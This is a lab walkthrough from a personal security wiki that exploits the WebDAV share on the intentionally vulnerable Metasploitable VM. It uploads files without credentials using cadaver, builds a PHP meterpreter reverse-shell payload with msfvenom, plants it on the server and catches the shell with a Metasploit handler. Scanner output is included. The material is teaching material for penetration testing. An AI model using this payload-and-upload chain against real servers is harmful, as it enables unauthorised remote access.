Metasploitable/Apache/DAV
From charlesreid1
What Is It?
WebDAV stands for Web Distributed Authoring and Versioning.
The WebDAV protocol provides a framework for users to create, change and move documents on a server, typically a web server or web share.
Command-Line Tools
Cadaver
Cadaver is a utility for dealing with WebDAV systems on the command line.
Some background here: http://web.cs.sunyit.edu/~yanarej/Labs430/Lab_7__Exploitation.pdf
We'll connect to the remote server using cadaver like cadaver http://10.0.0.27/dav.
Connect to Server
With cadaver, we can connect to the DAV server directly. It turns out this method does not require credentials. Once we type the cadaver command to connect to the server, we're immediately connected:
root@morpheus:~# cadaver http://10.0.0.27/dav dav:/dav/>
What this means is, we have access to the WebDAV directory, and we can create files:
root@morpheus:~# cadaver http://10.0.0.27/dav dav:/dav/> put test.txt Uploading test.txt to `/dav/test.txt': Progress: [=============================>] 100.0% of 12 bytes succeeded. dav:/dav/>
We can do other things, too:
dav:/dav/> ? Available commands: ls cd pwd put get mget mput edit less mkcol cat delete rmcol copy move lock unlock discover steal showlocks version checkin checkout uncheckout history label propnames chexec propget propdel propset search set open close echo quit unset lcd lls lpwd logout help describe about Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye dav:/dav/>
If you want to delete or move files:
root@morpheus:~# cadaver http://10.0.0.27/dav dav:/dav/> delete test.txt
Get a PHP Shell
In this example we'll use Metasploit to obtain a remote shell. We will do this by creating a PHP file that will give us a remote shell using msfvenom, then upload the PHP script via WebDAV.
Create A Payload
The msfvenom utility can be used to generate a reverse TCP shell in a PHP script. There's some important information contained here: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit
Basically, here's what you specify with msfvenom:
- LHOST - this is the machine that you want your target machine to try and connect to. This must be the publicly-visible (or at least visible to the target) IP of your command-and-control server.
- LPORT - this is the port number that you want the target machine to connect to. The command-and-control server must have this port open, for the target to connect to it.
In this case, Metasploitable is on the local network, so the command-and-control server's IP address is 10.0.0.25.
root@morpheus:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.25 LPORT=4444 -f raw > meterpreter.php No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 945 bytes
Now use cadaver to connect and put the PHP shell onto the web server:
root@morpheus:~# cadaver http://10.0.0.27/dav dav:/dav/> put meterpreter.php Uploading meterpreter.php to `/dav/meterpreter.php': Progress: [=============================>] 100.0% of 945 bytes succeeded. dav:/dav/>
Two more steps:
First, open msfconsole and wait for a connection from the remote host.
msf > use exploit/multi/handler msf exploit(handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.27 LHOST => 10.0.0.27 msf exploit(handler) > run [-] Handler failed to bind to 10.0.0.27:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Starting the payload handler...
This will wait for the reverse connection from the target machine.
The second and final step is to execute the PHP file. Click the PHP file or visit its url in the browser. This will execute the PHP code, create a shell, and open a connection to your metasploit console.
Houston, We Have A Shell
Now you have a Meterpreter shell.
Time to learn a whole new set of tools!
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
portfwd Forward a local port to a remote service
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
meterpreter >
Tools That Don't Work
While cadaver combined with msfvenom works great for connecting to a WebDAV server and delivering a payload, some tools did not work so great.
Davtest
You can test out DAV using the davtest command line utility.
Also used here: https://www.youtube.com/watch?v=JoV1aSuy1XU&t=21m52s
Check that you've got a copy:
# which davtest
Scan
You can scan a WebDAV server using the davtest program by specifying the url:
root@morpheus:~# davtest -url 10.0.0.27/dav ******************************************************** Testing DAV connection OPEN SUCCEED: 10.0.0.27/dav ******************************************************** NOTE Random string for this session: HE4bxEUNq5 ******************************************************** Creating directory MKCOL FAIL ******************************************************** Sending test files PUT cgi FAIL PUT shtml FAIL PUT cfm FAIL PUT pl FAIL PUT php FAIL PUT html FAIL PUT jsp FAIL PUT asp FAIL PUT txt FAIL PUT aspx FAIL PUT jhtml FAIL ******************************************************** /usr/bin/davtest Summary: root@morpheus:~#
This output is more helpful than the Metasploitable WebDAV scanner - but still doesn't do what cadaver does. It says we can't do any actions. But cadaver was able to do all those things without credentials. (???)
Action Failures
From the davtest scan, we saw a bunch of actions failed. I guess that means we need credentials to do anything. (?)
Metasploit Modules
To check for WebDAV, you can use a couple of different modules:
webdav scanner
Scan for WebDAV:
msf auxiliary(webdav_scanner) > run [*] 10.0.0.27 (Apache/2.2.8 (Ubuntu) DAV/2) WebDAV disabled. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(webdav_scanner) >
Looks like it is turned off...
webdav internal ip
we can use another scanner module to check for internal IPs with WebDAV enabled:
msf > use auxiliary/scanner/http/webdav_internal_ip msf auxiliary(webdav_internal_ip) > show options Module options (auxiliary/scanner/http/webdav_internal_ip): Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes Path to use Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host msf auxiliary(webdav_internal_ip) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(webdav_internal_ip) > run [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(webdav_internal_ip) >
webdav website content
Similarly with the next scanner:
msf auxiliary(webdav_website_content) > use auxiliary/scanner/http/webdav_website_content msf auxiliary(webdav_website_content) > show options Module options (auxiliary/scanner/http/webdav_website_content): Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes Path to use Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host msf auxiliary(webdav_website_content) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(webdav_website_content) > run [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(webdav_website_content) >
If you manage to find a writable directory, you can use it to get a remote shell: http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|